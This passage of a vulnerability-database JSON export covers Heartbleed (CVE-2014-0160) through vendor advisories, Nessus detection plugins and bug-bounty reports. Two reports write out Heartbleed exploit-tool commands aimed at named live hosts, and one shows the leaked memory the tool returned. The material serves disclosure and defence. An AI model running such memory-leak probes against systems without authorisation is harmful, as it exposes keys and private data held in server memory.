as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101503\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are 
listed.\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Smart Update Manager (SUM). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting HP SUM usage\r\nto a secure and isolated private management network.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnCEgCgs9NE3ajD5WkXefc30WZhR/JQ\r\ngwkAoNoHbkxpxzqSry1ZLk2OkJIc3Tnk\r\n=jhjw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30476", "title": "[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "cvelist": [], "description": "Уязвимость существует на portal.sf.mail.ru\r\nЭта уязвимость позволяет читать оперативную память кусками размером до 64КБ. 
Причем уязвимость двусторонняя, это значит, что не только вы можете читать данные с уязвимого сервера, но и сервер злоумышленника может получить часть вашей оперативной памяти как это сделал и я ради чистого эксперимента.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": [], "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "modified": "2014-04-09T00:37:33", "published": "2014-04-08T11:01:31", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", 
"type": "hackerone", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2014-0160"], "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.\n\nOnly 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.\n\nThanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n1.0.2 will be fixed in 1.0.2-beta2.\n\nhttp://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n", "modified": "2014-04-07T16:53:31", "published": "2014-04-05T23:51:06", "id": "H1:6626", "href": "https://hackerone.com/reports/6626", "type": "hackerone", "title": "OpenSSL (IBB): TLS heartbeat read overrun", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "cvelist": ["CVE-2014-0160"], "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... 
connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n", "modified": "2015-09-13T12:16:27", "published": "2015-02-25T07:49:11", "id": "H1:49139", "href": "https://hackerone.com/reports/49139", "type": "hackerone", "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension", "edition": 4, "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "ELSA-2014-0376", "href": "http://linux.oracle.com/errata/ELSA-2014-0376.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-01T04:33:12", "description": "According to its self-reported version number, the version of OpenVPN\ninstalled on the remote host is affected by an out-of-bounds read\nerror, known as the 'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.", "edition": 25, "published": "2014-04-22T00:00:00", "title": "OpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:openvpn:openvpn"], "id": "OPENVPN_2_3_3_0.NASL", "href": "https://www.tenable.com/plugins/nessus/73668", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73668);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"OpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks OpenVPN version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of OpenVPN\ninstalled on the remote host is affected by an out-of-bounds read\nerror, known as the 'Heartbleed Bug' in the included OpenSSL 
version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.openvpn.net/openvpn/wiki/heartbleed\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.openvpn.net/openvpn/wiki/ChangesInOpenvpn23\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to 2.3.4 (Installer I001) / 2.3.3 (Installer I002) / 2.3.2\n(Installer I004) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:openvpn:openvpn\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"openvpn_installed.nbin\");\n script_require_keys(\"SMB/OpenVPN/Installed\");\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/OpenVPN/Installed\");\ninstalls = get_kb_list_or_exit(\"SMB/OpenVPN/*/Version\");\nkb_entry = branch(keys(installs));\nkb_base = kb_entry - \"/Version\";\n\nversion = get_kb_item_or_exit(kb_entry);\npath = get_kb_item_or_exit(kb_base + \"/Path\");\n\nif (version =~ \"^2(\\.3)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"OpenVPN\", version);\nif (version !~ \"^2\\.3[^0-9]\") audit(AUDIT_NOT_INST, \"OpenVPN 2.3.x\");\n\n# Note : vendor has been rebuilding the\n# same versions with different versions of\n# openssl, so we need to check openssl dll.\n# OpenSSL 1.0.1 through 1.0.1f are vuln.\nopenssl_ver = get_kb_item_or_exit(kb_base + \"/ssleay32_dll_version\");\nopenssl_path = get_kb_item_or_exit(kb_base + \"/ssleay32_dll_path\");\n\nif (openssl_ver =~ \"^1\\.0\\.1($|[a-f])\")\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n # Set user-friendly report ver if possible\n if (version =~ \"^2\\.3\\.4($|[^0-9])\") fixed_version = '2.3.4 (Installer I001)';\n else if (version =~ \"^2\\.3\\.3($|[^0-9])\") fixed_version = '2.3.3 (Installer I002)';\n else if (version =~ \"^2\\.3\\.2($|[^0-9])\") fixed_version = '2.3.2 (Installer I004)';\n else fixed_version = '2.3.4 (Installer I001) / 2.3.3 (Installer I002) / 2.3.2 (Installer I004)';\n\n report = '\\n OpenVPN path : ' + path +\n '\\n OpenVPN installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n DLL file : ' + openssl_path +\n '\\n DLL installed version : ' + 
openssl_ver +\n '\\n DLL fixed version : 1.0.1g';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"OpenVPN\", version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T05:43:04", "description": "The remote host is missing KB2962393, which resolves an OpenSSL\ninformation disclosure vulnerability (Heartbleed) in the Juniper VPN\nclient software shipped with Windows 8.1.", "edition": 28, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2014-05-05T00:00:00", "title": "MS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB2962393.NASL", "href": "https://www.tenable.com/plugins/nessus/73865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73865);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MSKB\", value:\"2962393\");\n\n script_name(english:\"MS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed)\");\n script_summary(english:\"Checks the file timestamps.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has VPN client software installed that is affected by\nan information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing 
KB2962393, which resolves an OpenSSL\ninformation disclosure vulnerability (Heartbleed) in the Juniper VPN\nclient software shipped with Windows 8.1.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://iam-fed.juniper.net/auth/xlogin.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2015/2962393\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2962393.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"datetime.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName');\nif (\"Windows 8.1\" >!< productname ) audit(AUDIT_OS_NOT, \"Microsoft Windows 8.1\");\n\nwindir = hotfix_get_systemroot();\nhotfix_check_fversion_init();\nif (!windir) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:windir);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nfile_path = hotfix_append_path(path:windir, value:\"System32\\Kernel32.dll\");\ndriver_stl = hotfix_get_fversion(path:file_path);\n\nhotfix_handle_error(error_code:driver_stl['error'], file:file_path, exit_on_fail:TRUE);\nhotfix_check_fversion_end();\n\nkernel_ver = join(driver_stl['value'], sep:'.');\narch = get_kb_item_or_exit('SMB/ARCH');\n\nfilename1 = hotfix_append_path(path:windir, value:\"vpnplugins\\juniper\\JunosPulseVpnBg.dll\");\nfile_timestamp = hotfix_get_timestamp(path:filename1);\n\nhotfix_handle_error(error_code:file_timestamp['error'],\n file:filename1,\n appname:\"Junos Pulse VPN Client\",\n exit_on_fail:false);\n\ntimestamp1 = file_timestamp['value'];\n\nfilename2 = hotfix_append_path(path:windir, value:\"System32\\Mrmcorer.dll\");\nfile_timestamp = hotfix_get_timestamp(path:filename2);\n\nhotfix_handle_error(error_code:file_timestamp['error'],\n file:filename2,\n appname:\"Microsoft 
Windows MRM\",\n exit_on_fail:false);\n\ntimestamp2 = file_timestamp['value'];\n\nhotfix_check_fversion_end();\n\nfilename = filename1;\ncur_ts = int(timestamp1);\nfix_ts = NULL;\nreq_kb = '2962140';\n\n# with KB2919355\nif(kernel_ver =~ \"^6\\.3\\.9600\\.17\" && arch == \"x64\")\n{\n fix_ts = 1394542933;\n filename = filename2;\n cur_ts = int(timestamp2);\n}\nelse if(kernel_ver =~ \"^6\\.3\\.9600\\.17\" && arch == \"x86\")\n{\n fix_ts = 1398036128;\n}\n# without KB2919355\nelse if(kernel_ver =~ \"^6\\.3\\.9600\\.16\" && arch == \"x64\")\n{\n fix_ts = 1398897861;\n req_kb = '2964757';\n}\nelse if(kernel_ver =~ \"^6\\.3\\.9600\\.16\" && arch == \"x86\")\n{\n fix_ts = 1398879468;\n req_kb = '2964757';\n}\n\nif (isnull(fix_ts)) audit(AUDIT_HOST_NOT, 'affected');\n\nif (cur_ts < fix_ts)\n{\n port = kb_smb_transport();\n report =\n '\\n File : ' + filename +\n '\\n File timestamp : ' + strftime(cur_ts) +\n '\\n Fixed timestamp : ' + strftime(fix_ts) +\n '\\n Missing KB update : ' + req_kb + '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:14:14", "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. 
A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "edition": 20, "published": "2014-04-08T00:00:00", "title": "RHEL 6 : openssl (RHSA-2014:0376)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:openssl-devel"], "id": "REDHAT-RHSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0376. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73396);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"RHEL 6 : openssl (RHSA-2014:0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", 